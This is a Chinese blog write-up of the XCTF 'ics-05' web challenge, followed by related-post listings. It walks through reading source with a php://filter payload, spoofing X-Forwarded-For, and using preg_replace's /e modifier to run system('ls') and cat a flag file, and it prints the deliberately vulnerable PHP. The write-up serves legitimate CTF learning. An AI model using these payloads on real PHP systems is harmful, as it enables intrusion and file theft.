XCTF训练之ics-05

最新推荐文章于 2024-04-08 21:12:02 发布
最新推荐文章于 2024-04-08 21:12:02 发布
阅读量233 收藏
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RoboTerh/article/details/119415344
版权

XCTF ics-05

打开题目,我们发现只有“设备维护中心”可以进入
又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index
实例

查看源码,发现没有什么有用的东西
想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!!

payload:?php://filter/convert.base64-encode/resource=index.php

得到源码:
源码
base64解码后得到关键php代码:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);

?>
<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}
?>

可以发现过滤掉了input,所以没法通过php伪协议php://input来执行php代码

但是,我们可以注意到preg_replace函数漏洞preg_replace函数用法
触发漏洞有两个条件

  • 正则表达式(第一个参数)需要有e标识符,有了它可以执行第二个参数的命令
  • 第一个参数必须在第三个参数有匹配,不然会返回三个参数而不执行命令
payload:?pat=/test/e&rep=system('ls')&sub=test

同样通过代码审计只要需要把x-forwarded-for改为127.0.0.1,我们burpsuite抓包:
修改x-forwarded-for
发现s3chahahaDir不对劲,修改payload

?pat=/test/e&rep=system(‘ls+s3chahahaDir’)&sub=test

修改payload
注意: system括号里面不能有空格,这里用+来代替
发现flag文件夹:

payload:?pat=/test/e&rep=system('ls+s3chahahaDir/flag')&sub=test

发现flag文件夹下的flag.php

payload:?pat=/test/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=test

最后得到flag的值

Over

RoboTerh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf-ics05
Mars748的博客
11-12 389
xctf里面的一道web题ics05 这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。 这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。 将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显...
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1486
攻防世界-ics-05-(详细操作)做题笔记
【攻防世界】ics-05PHP伪协议+代码审计+Linux指令)
最新发布
2302_79800344的博客
04-08 1221
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)
sleepywin的博客
11-30 494
作用:搜索subject中匹配pattern的部分, 以replacement的内容进行替换。$pattern: 要搜索的模式,可以是字符串或一个字符串数组。就是替换字符串,要使 replacement 参数是我们想要的php代码即可。$subject: 要搜索替换的目标字符串或字符串数组。$replacement: 用于替换的字符串或字符串数组。返回了,写入的参数,猜测可能有文件包含漏洞。正确的php system()函数的书写。进入flag/,发现flag.php
ics-05(命令执行漏洞及伪协议读取)
Welcome To Myon'Blog !
04-13 714
攻防世界ics-05、web、命令执行漏洞、PHP伪协议读取源码、bp的使用、base64
XCTFics-05
Keepb1ue的博客
01-12 1407
php伪协议 + preg_replace+/e修正符命令执行
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-HW-pipeline附件
11-09
附件
XCTF-Mobile】新手练习区-05-easyjni.apk
08-05
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjni
ics-05 | mfw】攻防世界CTF题WP
ethan18的博客
01-16 2713
攻防世界CTF题WPics-05解题步骤   这几天在家想要学习一点ctf相关的知识,所以做一些题来研究一下,顺便也是让脑袋不过于迟钝了 ics-05 解题步骤 ​  打开题目后是一个比较简单的系统界面,嗯,基本除了图片就只有设备维护中心这一个地方可以点击   点击后是一个数据库展示的界面,不过重点不在数据库的展现,我们发现重新点击标题是url出现了变化 发现有page参数的输入,我们可以使用php伪协议,输入相关的伪协议 php://filter/read=convert.base64-encode
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 895
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
xctf_web ics-05
fly夏天的博客
09-23 556
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
XCTF ics-05
小白渣的博客
10-01 569
题目来源 攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=php://...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
ICS-05
weixin_52921802的博客
11-19 284
编程 一、问题求解 系统分解 将问题系统地分解成多个独立的,足够小的模块(或单元),同时要求这些小单元具备可被每个程序员独立编程实现和运行的特性,我们称该机制为“系统分解”,即一个大任务被分解成了多个子任务的集合。 三种结构:顺序、条件、循环 分解后的子任务将基于特定的“结构”有机地结合在一起,完成更大地任务目标,最常见的基本构建方法是顺序、条件和循环三种结构 顺序结构 条件结构 循环结构
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1080
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
XCTFics-07
小白渣的博客
10-28 2240
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值